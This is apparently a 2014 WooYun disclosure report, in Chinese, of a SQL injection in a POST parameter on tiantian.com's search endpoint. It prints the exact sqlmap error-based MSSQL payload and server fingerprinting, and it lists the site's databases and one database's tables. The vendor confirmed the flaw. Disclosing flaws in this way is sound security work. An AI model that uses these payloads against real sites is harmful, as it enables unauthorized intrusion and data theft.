漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-060774
漏洞标题:天天团购主站post注入
相关厂商:tiantian.com
漏洞作者: 疯子
提交时间:2014-05-15 10:55
修复时间:2014-06-29 10:56
公开时间:2014-06-29 10:56
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-15: 细节已通知厂商并且等待厂商处理中
2014-05-15: 厂商已经确认,细节仅向厂商公开
2014-05-25: 细节向核心白帽子及相关领域专家公开
2014-06-04: 细节向普通白帽子公开
2014-06-14: 细节向实习白帽子公开
2014-06-29: 细节向公众公开
简要描述:
天天团购主站post注入
详细说明:
测试发现主站存在一处很隐秘的注入,听说天天有礼物就来了,你们懂的!
http://www.tiantian.com/products/search/index?Ajax_CallBack=true
post:Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397
漏洞证明:
sqlmap identified the following injection points with a total of 412 HTTP(s) requests:
---
Place: POST
Parameter: Ajax_CallBackArgument0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355') AND 6600=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6600=6600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(99)+CHAR(117)+CHAR(113))) AND ('KRzD'='KRzD&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397
---
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: Ajax_CallBackArgument0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355') AND 6600=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6600=6600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(99)+CHAR(117)+CHAR(113))) AND ('KRzD'='KRzD&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397
---
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] CPS_Log
[*] CPS_Union
[*] DBAdmin
[*] master
[*] model
[*] msdb
[*] newsite
[*] NewSite_Action
[*] NewSite_Archive
[*] NewSite_Biz
[*] NewSite_His
[*] NewSite_Wireless
[*] SiteBase
[*] tempdb
[*] tuan_sub
[*] WMSys_SKU_sub
[*] WMSys_sub
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: Ajax_CallBackArgument0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355') AND 6600=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6600=6600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(99)+CHAR(117)+CHAR(113))) AND ('KRzD'='KRzD&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397
---
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: NewSite_Action
[78 tables]
+----------------------------------------+
| Action_Activity |
| Action_ColifNvShen |
| Action_Coupons_RecevieRecord |
| Action_DonateOrder |
| Action_FLRecode |
| Action_InviteCountRecord |
| Action_InviteRecord |
| Action_InviteRecordActivity |
| Action_InviteRecordUsed |
| Action_OrderBuyList |
| Action_OrderInfoList |
| Action_OrderMessage |
| Action_OrderProduct |
| Action_OrderStepPrice |
| Action_RechargeCard |
| Action_SignCountRecord |
| Action_SignLotteryInfo |
| Action_SignLotteryRecord |
| Action_SignRecord |
| Action_SignUpdateSeriesCountLog |
| Action_Statistics_User |
| Action_UsedRecord |
| CMS_NewsChannel |
| CMS_NewsInfo |
| CMS_News_Extend |
| Coupon_ReturnCoupon_Record |
| FanLi_Commision |
| FanLi_OrderInfo |
| FanLi_SiteInfo |
| FanLi_SiteTypeInfo |
| FanLi_TypeInfo |
| Favourable_ActivityList |
| Favourable_ActivityType |
| Favourable_Activity_Extend |
| MSpeer_conflictdetectionconfigrequest |
| MSpeer_conflictdetectionconfigresponse |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| MSpeer_request |
| MSpeer_response |
| MSpeer_topologyrequest |
| MSpeer_topologyresponse |
| MSpub_identity_range |
| Order_ActivityList |
| Promotion_Active |
| Promotion_ActiveRule |
| Promotion_InstanceData |
| Promotion_Rule |
| Promotion_RuleItem |
| Promotion_RuleItem_Relation |
| Promotion_RuleObject |
| Promotion_RuleValue |
| Rule_GiftRecond |
| Rule_RuleChildType |
| Rule_RuleCondition |
| Rule_RuleMain |
| Rule_RuleMainType |
| Rule_RuleReward |
| SKU_Product_Recommend |
| UserInfo_Extend |
| Vote_ActionInfo |
| Vote_Base_ProductImgage |
| Vote_Base_ProductInfo |
| Vote_Count |
| Vote_Log |
| Vote_Result |
| syncobj_0x3237343046304441 |
| sysarticlecolumns |
| sysarticles |
| sysarticleupdates |
| sysdiagrams |
| sysextendedarticlesview |
| syspublications |
| sysreplservers |
| sysschemaarticles |
| syssubscriptions |
| systranschemas |
| vPromotion_RuleItem_Relation |
+----------------------------------------+
修复方案:
过滤
版权声明:转载请注明来源 疯子@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-05-15 12:49
厂商回复:
联系方式
最新状态:
暂无